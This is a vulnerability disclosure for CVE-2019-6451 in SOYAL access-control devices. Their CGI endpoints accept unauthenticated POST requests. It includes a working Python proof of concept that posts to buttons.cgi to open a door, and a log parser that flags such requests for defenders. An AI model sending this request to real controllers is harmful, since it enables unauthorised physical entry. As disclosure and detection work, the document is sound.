CVE-2019-6451

Timeline

  • January 15, 2019 reported to SOYAL
  • January 15, 2019 arranged meeting time for further discussions
  • January 16, 2019 CVE assigned

Affected Products

  • SOYAL-AR727H
  • SOYAL-AR829Ev5

Technical Details

On these devices, all CGI programs accept unauthenticated POST requests.

Anyone who knows the proper parameters and format can trigger device functions, such as opening the door or inserting a new account on the device.

The Direct Control tab lets you control the door directly.

The request can be replayed with Burp Suite or sent with the Python code below:

import requests

# IP is a placeholder for the address of the device under test.
# The request carries no credentials or session cookie.
response = requests.post('http://IP/buttons.cgi', data={
    'btn_Node': '255',
    'btnOpenAllPulse': '+Action+',
    'btn_nameDI0': 'DI0',
    'btn_nameDI1': 'DI1',
    'btn_nameDI2': 'DI2',
    'btn_nameDI3': 'DI3',
    'btn_nameDO0': 'RelayOutput0',
    'delayDO0': '0',
    'btn_nameDO1': 'DO1',
    'delayDO1': '0',
    'btn_nameDO2': 'DO2',
    'delayDO2': '0',
    'btn_nameDO3': 'DO3',
    'delayDO3': '0',
})

OPEN SESAME !!!
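For defenders, the unauthenticated CGI POSTs described above can be flagged in access logs. This is an added example, not code from the original README or from the vendor. It assumes the controller sits behind a reverse proxy that writes Common Log Format and enforces HTTP authentication; `MGMT_NET`, `/example.cgi` and the log lines are constructed for illustration.

```python
import ipaddress
import re

# Assumption: a reverse proxy in front of the controller writes Common Log Format
# and sets the authuser field; MGMT_NET is a constructed management subnet.
MGMT_NET = ipaddress.ip_network("10.20.0.0/28")
CLF = re.compile(
    r'(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log lines; /example.cgi is a hypothetical second CGI path.
SAMPLE_LOG = """\
10.20.0.5 - admin [16/Jan/2019:09:01:12 +0000] "POST /buttons.cgi HTTP/1.1" 200 512
10.20.0.9 - - [16/Jan/2019:09:03:40 +0000] "POST /buttons.cgi HTTP/1.1" 200 512
192.168.7.44 - - [16/Jan/2019:09:04:02 +0000] "POST /buttons.cgi?x=1 HTTP/1.1" 200 512
192.168.7.44 - - [16/Jan/2019:09:04:05 +0000] "GET /index.htm HTTP/1.1" 200 2048
192.168.7.44 - admin [16/Jan/2019:09:05:00 +0000] "POST /example.cgi HTTP/1.1" 401 0
garbage line that does not parse
"""


def in_mgmt_net(src):
    """True only for a literal IP address inside the management subnet."""
    try:
        return ipaddress.ip_address(src) in MGMT_NET
    except ValueError:  # hostname or malformed field: treat as untrusted
        return False


def flag_cgi_posts(log_text):
    """Return one finding per POST to a .cgi path that lacks auth or a trusted source."""
    findings = []
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0]
        if not path.lower().endswith(".cgi"):
            continue
        reasons = []
        if m["user"] == "-":
            reasons.append("no-auth")
        if not in_mgmt_net(m["src"]):
            reasons.append("outside-mgmt-net")
        if reasons:
            findings.append({"ts": m["ts"], "src": m["src"], "path": path,
                             "status": int(m["status"]), "reasons": reasons})
    return findings
```

Call `flag_cgi_posts(SAMPLE_LOG)` to see the three findings; a finding with status 200 and reason `no-auth` is the case this CVE describes.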

Discoverer
